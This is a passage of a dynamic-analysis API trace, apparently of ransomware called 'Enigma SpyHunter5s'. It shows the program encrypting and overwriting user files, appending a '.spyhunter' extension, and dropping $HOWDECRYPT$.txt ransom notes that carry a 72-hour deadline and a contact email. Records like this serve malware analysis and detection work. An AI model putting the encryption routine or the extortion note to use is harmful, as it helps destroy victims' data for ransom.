(HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0144.253] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef40*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef40*=0x30) returned 1 [0144.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.254] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 80 [0144.254] StrStrW (lpFirst="Desktop.ini", lpSrch=".txt") returned 0x0 [0144.254] GetProcessHeap () returned 0x2c0000 [0144.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0144.254] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cef04*=0x285, lpOverlapped=0x0) returned 1 [0144.255] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.255] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x25cef04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cef04*=0x285, lpOverlapped=0x0) returned 1 [0144.255] GetProcessHeap () returned 0x2c0000 [0144.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0144.255] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.255] WriteFile (in: hFile=0xa0, lpBuffer=0x25cef44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef04, lpOverlapped=0x0 | out: lpBuffer=0x25cef44*, lpNumberOfBytesWritten=0x25cef04*=0x4, lpOverlapped=0x0) returned 1 [0144.255] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef04, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef04*=0x30, lpOverlapped=0x0) returned 1 [0144.255] CloseHandle (hObject=0xa0) returned 1 [0144.255] GetProcessHeap () returned 0x2c0000 [0144.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0144.255] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.spyhunter") returned 90 [0144.256] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini.spyhunter")) returned 1 [0144.260] GetProcessHeap () returned 0x2c0000 [0144.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0144.260] GetProcessHeap () returned 0x2c0000 [0144.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0144.260] GetProcessHeap () returned 0x2c0000 [0144.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f656b8 | out: hHeap=0x2c0000) returned 1 [0144.261] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef40 | out: pbBuffer=0x25cef40) returned 1 [0144.261] GetProcessHeap () returned 0x2c0000 [0144.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0144.261] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef38*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef38*=0x30) returned 1 [0144.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.261] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 78 [0144.261] StrStrW (lpFirst="Bears.jpg", lpSrch=".txt") returned 0x0 [0144.261] GetProcessHeap () returned 0x2c0000 [0144.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0144.261] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceefc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ceefc*=0x432, lpOverlapped=0x0) returned 1 [0144.269] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffbce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.269] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x432, lpNumberOfBytesWritten=0x25ceefc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ceefc*=0x432, lpOverlapped=0x0) returned 1 [0144.270] GetProcessHeap () returned 0x2c0000 [0144.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0144.270] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.270] WriteFile (in: hFile=0xa0, lpBuffer=0x25cef3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceefc, lpOverlapped=0x0 | out: lpBuffer=0x25cef3c*, lpNumberOfBytesWritten=0x25ceefc*=0x4, lpOverlapped=0x0) returned 1 [0144.270] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceefc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ceefc*=0x30, lpOverlapped=0x0) returned 1 [0144.270] CloseHandle (hObject=0xa0) returned 1 [0144.270] GetProcessHeap () returned 0x2c0000 [0144.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0144.270] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.spyhunter") returned 88 [0144.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg.spyhunter")) returned 1 [0144.271] GetProcessHeap () returned 0x2c0000 [0144.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0144.271] GetProcessHeap () returned 0x2c0000 [0144.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0144.271] GetProcessHeap () returned 0x2c0000 [0144.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f32050 | out: hHeap=0x2c0000) returned 1 [0144.271] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef40 | out: pbBuffer=0x25cef40) returned 1 [0144.271] GetProcessHeap () returned 0x2c0000 [0144.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0144.271] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef38*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef38*=0x30) returned 1 [0144.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.271] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log") returned 81 [0144.271] StrStrW (lpFirst="edb00001.log", lpSrch=".txt") returned 0x0 [0144.271] GetProcessHeap () returned 0x2c0000 [0144.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0144.272] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceefc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ceefc*=0x2800, lpOverlapped=0x0) returned 1 [0144.635] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.635] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ceefc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ceefc*=0x2800, lpOverlapped=0x0) returned 1 [0144.636] GetProcessHeap () returned 0x2c0000 [0144.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0144.636] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.636] WriteFile (in: hFile=0xa0, lpBuffer=0x25cef3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceefc, lpOverlapped=0x0 | out: lpBuffer=0x25cef3c*, lpNumberOfBytesWritten=0x25ceefc*=0x4, lpOverlapped=0x0) returned 1 [0144.638] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceefc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ceefc*=0x30, lpOverlapped=0x0) returned 1 [0144.638] CloseHandle (hObject=0xa0) returned 1 [0144.638] GetProcessHeap () returned 0x2c0000 [0144.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0144.639] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.spyhunter") returned 91 [0144.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log.spyhunter")) returned 1 [0144.639] GetProcessHeap () returned 0x2c0000 [0144.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0144.640] GetProcessHeap () returned 0x2c0000 [0144.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0144.640] GetProcessHeap () returned 0x2c0000 [0144.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f657a8 | out: hHeap=0x2c0000) returned 1 [0144.640] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef38 | out: pbBuffer=0x25cef38) returned 1 [0144.640] GetProcessHeap () returned 0x2c0000 [0144.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0144.640] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef30*=0x30) returned 1 [0144.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.932] GetProcessHeap () returned 0x2c0000 [0144.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0144.933] GetProcessHeap () returned 0x2c0000 [0144.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef7498 | out: hHeap=0x2c0000) returned 1 [0144.933] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef38 | out: pbBuffer=0x25cef38) returned 1 [0144.933] GetProcessHeap () returned 0x2c0000 [0144.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0144.933] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef30*=0x30) returned 1 [0144.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.933] GetProcessHeap () returned 0x2c0000 [0144.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0144.933] GetProcessHeap () returned 0x2c0000 [0144.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffa970 | out: hHeap=0x2c0000) returned 1 [0144.933] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef30 | out: pbBuffer=0x25cef30) returned 1 [0144.933] GetProcessHeap () returned 0x2c0000 [0144.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0144.933] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef28*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef28*=0x30) returned 1 [0144.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.934] GetProcessHeap () returned 0x2c0000 [0144.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0144.934] GetProcessHeap () returned 0x2c0000 [0144.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f69820 | out: hHeap=0x2c0000) returned 1 [0144.934] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef30 | out: pbBuffer=0x25cef30) returned 1 [0144.934] GetProcessHeap () returned 0x2c0000 [0144.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0144.934] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef28*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef28*=0x30) returned 1 [0144.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.934] GetProcessHeap () returned 0x2c0000 [0144.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0144.937] GetProcessHeap () returned 0x2c0000 [0144.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f62fe0 | out: hHeap=0x2c0000) returned 1 [0144.937] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef28 | out: pbBuffer=0x25cef28) returned 1 [0144.937] GetProcessHeap () returned 0x2c0000 [0144.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0144.937] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef20*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef20*=0x30) returned 1 [0144.937] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.937] GetProcessHeap () returned 0x2c0000 [0144.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0144.938] GetProcessHeap () returned 0x2c0000 [0144.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f62ed8 | out: hHeap=0x2c0000) returned 1 [0144.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0144.939] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0144.939] WriteFile (in: hFile=0x9c, lpBuffer=0x25cee5b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cef84, lpOverlapped=0x0 | out: lpBuffer=0x25cee5b*, lpNumberOfBytesWritten=0x25cef84*=0x127, lpOverlapped=0x0) returned 1 [0144.964] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0144.964] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cef84, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cef84*=0x2ac, lpOverlapped=0x0) returned 1 [0144.965] CloseHandle (hObject=0x9c) returned 1 [0144.965] GetProcessHeap () returned 0x2c0000 [0144.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30007f8 | out: hHeap=0x2c0000) returned 1 [0144.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.393] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.393] WriteFile (in: hFile=0x9c, lpBuffer=0x25cee57*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cef80, lpOverlapped=0x0 | out: lpBuffer=0x25cee57*, lpNumberOfBytesWritten=0x25cef80*=0x127, lpOverlapped=0x0) returned 1 [0145.394] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.394] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cef80, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cef80*=0x2ac, lpOverlapped=0x0) returned 1 [0145.394] CloseHandle (hObject=0x9c) returned 1 [0145.394] GetProcessHeap () returned 0x2c0000 [0145.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f62bc0 | out: hHeap=0x2c0000) returned 1 [0145.394] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef20 | out: pbBuffer=0x25cef20) returned 1 [0145.394] GetProcessHeap () returned 0x2c0000 [0145.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.394] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef18*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef18*=0x30) returned 1 [0145.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.403] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 130 [0145.403] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0145.403] GetProcessHeap () returned 0x2c0000 [0145.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0145.403] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceedc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ceedc*=0x2800, lpOverlapped=0x0) returned 1 [0145.404] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.405] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ceedc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ceedc*=0x2800, lpOverlapped=0x0) returned 1 [0145.407] GetProcessHeap () returned 0x2c0000 [0145.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0145.407] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, 